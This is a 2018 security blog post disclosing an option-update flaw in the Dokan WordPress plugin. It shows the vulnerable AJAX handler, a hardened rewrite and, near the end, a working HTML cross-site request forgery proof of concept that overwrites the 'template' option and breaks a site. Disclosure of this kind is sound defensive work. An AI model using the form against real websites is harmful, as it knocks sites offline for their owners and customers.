12 Dec 2018

Our Proactive Monitor Caught Another Authenticated Option Update Vulnerability in a WordPress Plugin That Could Disable Websites

On Monday, while disclosing another option update vulnerability, we noted that in the wake of one of those being widely exploited recently we had focused on finding more of those vulnerabilities, while it appears no one else in the WordPress security community has done that (maybe because they can get away with lying about failing to protect against the widely exploited one). And no sooner than the next day did we find yet another vulnerability. We spotted it during our proactive monitoring of changes being made to WordPress plugins, which tries to catch serious vulnerabilities when they are introduced into plugins. The vulnerable code was not flagged by the software we use to identify possible issues for us to review; instead, that software had flagged another possible instance of the same type of vulnerability in the same code, and when we went to manually review the code we found the issue.

While the vulnerability doesn’t appear to allow for takeover of a website, it would allow anyone logged in to WordPress to disable the website with a single request. Since the plugin in question, Dokan, is only usable with the WooCommerce eCommerce plugin, which is often set to create WordPress accounts for those making orders, many or most of the 10,000+ active installations of the plugin (according to wordpress.org) would be impacted. It could also be exploited by getting someone logged in to WordPress to access a page controlled by an attacker.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously fully disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriately is more important than what is best for the rest of the community.

Technical Details

The plugin registers the function dismiss_upgrade_promo() to be accessible to anyone logged in to WordPress through its AJAX functionality:

add_action( 'wp_ajax_dokan-dismiss-upgrade-promotional-notice', array( $this, 'dismiss_upgrade_promo' ) );

That function, which is located in the file /lib/promotions.php, will update a WordPress option (setting) whose name is taken directly from the POST input “promo_key”, setting it to a value modified by the POST input “key”. Neither the option name nor the user’s capabilities are checked:

public function dismiss_upgrade_promo() {
	if ( isset( $_POST['dokan_upgrade_promotion_dismissed'] ) && $_POST['dokan_upgrade_promotion_dismissed'] ) {
		// The option name to write comes straight from user input, so any
		// WordPress option (e.g. "template") can be targeted.
		$promo_option_key        = $_POST['promo_key'];
		$promo_last_display_time = $_POST['promo_key'] . '_displayed_time';
 
		$already_displayed_promo = get_option( $promo_option_key, array() );
 
		// The existing option value is treated as an array and a new entry,
		// keyed by the unchecked POST input "key", is added to it.
		if ( ! isset( $already_displayed_promo[ $_POST['key'] ] ) ) {
			$already_displayed_promo[ $_POST['key'] ] = array(
				'display'        => 0,
				'last_displayed' => current_time( 'mysql' )
			);
		}
 
		// The attacker-chosen option is overwritten with the modified array.
		update_option( $promo_option_key, $already_displayed_promo );
	}
}

As we found when looking into another similar vulnerability, replacing the “template” option with content like what can be set through this function disables both the frontend and the admin area of the website.

Since there is no check for a valid nonce, this could also be exploited through cross-site request forgery (CSRF).
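For comparison, here is a hardened version of the handler. This is an added illustration and not Dokan’s own fix; the nonce action name, the required capability and the list of permitted option keys are assumptions made for the example.

```php
<?php
// Hardened rewrite of dismiss_upgrade_promo() added for illustration; this is
// not Dokan's own fix. The nonce action name, the required capability and the
// list of permitted option keys are assumptions made for the example.
class Dokan_Promo_Dismiss_Example {

    // Only these option names may be written by this handler (assumed names).
    const ALLOWED_PROMO_KEYS = array( 'dokan_upgrade_promo', 'dokan_vendor_promo' );

    // Still registered with add_action( 'wp_ajax_dokan-dismiss-upgrade-promotional-notice', ... )
    public function dismiss_upgrade_promo() {
        // 1. Nonce check stops CSRF; the admin JS must send the token as "nonce".
        check_ajax_referer( 'dokan-dismiss-upgrade-promo', 'nonce' );

        // 2. Capability check: dismissing an admin notice is an admin action, so a
        //    customer account created by WooCommerce is rejected here.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( 'insufficient permissions', 403 );
        }
        if ( empty( $_POST['dokan_upgrade_promotion_dismissed'] ) ) {
            wp_send_json_error( 'nothing to dismiss', 400 );
        }

        // 3. The request must not name the option: accept only an allowlisted key,
        //    so "template" (or any other core option) can never be overwritten.
        $promo_option_key = isset( $_POST['promo_key'] ) ? sanitize_key( $_POST['promo_key'] ) : '';
        if ( ! in_array( $promo_option_key, self::ALLOWED_PROMO_KEYS, true ) ) {
            wp_send_json_error( 'unknown promotion', 400 );
        }

        // 4. Sanitize the sub-key before using it as an array index.
        $notice_key = isset( $_POST['key'] ) ? sanitize_key( $_POST['key'] ) : '';
        if ( '' === $notice_key ) {
            wp_send_json_error( 'missing notice key', 400 );
        }

        $already_displayed_promo = get_option( $promo_option_key, array() );
        if ( ! is_array( $already_displayed_promo ) ) {
            $already_displayed_promo = array();
        }
        if ( ! isset( $already_displayed_promo[ $notice_key ] ) ) {
            $already_displayed_promo[ $notice_key ] = array(
                'display'        => 0,
                'last_displayed' => current_time( 'mysql' ),
            );
        }
        update_option( $promo_option_key, $already_displayed_promo );
        wp_send_json_success();
    }
}
```

The allowlist is the key fix: even with the nonce and capability checks in place, a handler that lets the request choose the option name remains a risk if any permitted user is later compromised.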

Proof of Concept

The following proof of concept will break the website when you are logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=dokan-dismiss-upgrade-promotional-notice" method="POST">
<input type="hidden" name="dokan_upgrade_promotion_dismissed" value="true" />
<input type="hidden" name="promo_key" value="template" />
<input type="hidden" name="key" value="test" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
